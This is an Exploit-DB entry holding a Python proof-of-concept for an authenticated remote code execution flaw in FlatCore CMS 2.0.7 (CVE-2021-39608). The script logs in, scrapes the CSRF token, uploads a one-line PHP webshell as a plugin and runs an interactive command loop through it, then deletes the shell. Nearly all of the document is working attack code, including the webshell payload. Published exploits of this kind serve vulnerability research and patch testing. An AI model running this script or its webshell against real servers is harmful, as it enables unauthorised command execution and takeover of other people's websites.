FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)

EDB-ID:

50262




Platform:

PHP

Date:

2021-09-06


# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/10/2021
# Exploit Author: Mason Soroka-Gill @sgizoid
# Vendor Homepage: https://flatcore.org/
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
# Version: 2.0.7
# Tested on: Ubuntu Server 21.04
# CVE: CVE-2021-39608
# References:
#   - https://github.com/flatCore/flatCore-CMS/issues/52

#!/usr/bin/env python3

import sys
import requests
from lxml import html
from urllib.parse import urlencode

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
    exit(1)

TARGET   = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]

# attempt to log in
resp = requests.post(f"{TARGET}/index.php?p=1",
        data={
            "login_name":f"{USERNAME}",
            "login_psw":f"{PASSWORD}",
            "login":"Anmelden"})

# grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]

# validate credentials worked
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",
        headers={"Cookie":PHPSESSID})
if resp.status_code != 200:
    print("Invalid credentials")
    exit(1)
else:
    print("Logged in")

# grab the csrf token for the script upload
csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value

# post the shell to the host
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
        data={"upload_type":"plugin", "csrf_token":csrf_token},                     # the csrf token
        files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")},   # the webshell
        headers={"Cookie":PHPSESSID})                                               # the php session id

# pretend to be a shell
while True:
    command = input("$ ")
    if command.lower() == "exit" or command.lower() == "q":
        break
    resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")
    # verify payload succeeded
    if resp.status_code == 200:
        print(resp.text)
    else:
        print("Error: Something went wrong, maybe the shell didn't work?")
        break

# delete the webshell
resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",
        headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
    print("Cleaned up webshell")

# clean up the session
resp = requests.get(f"{TARGET}/index.php?goto=logout",
        headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
    print("Logged out")

exit(0)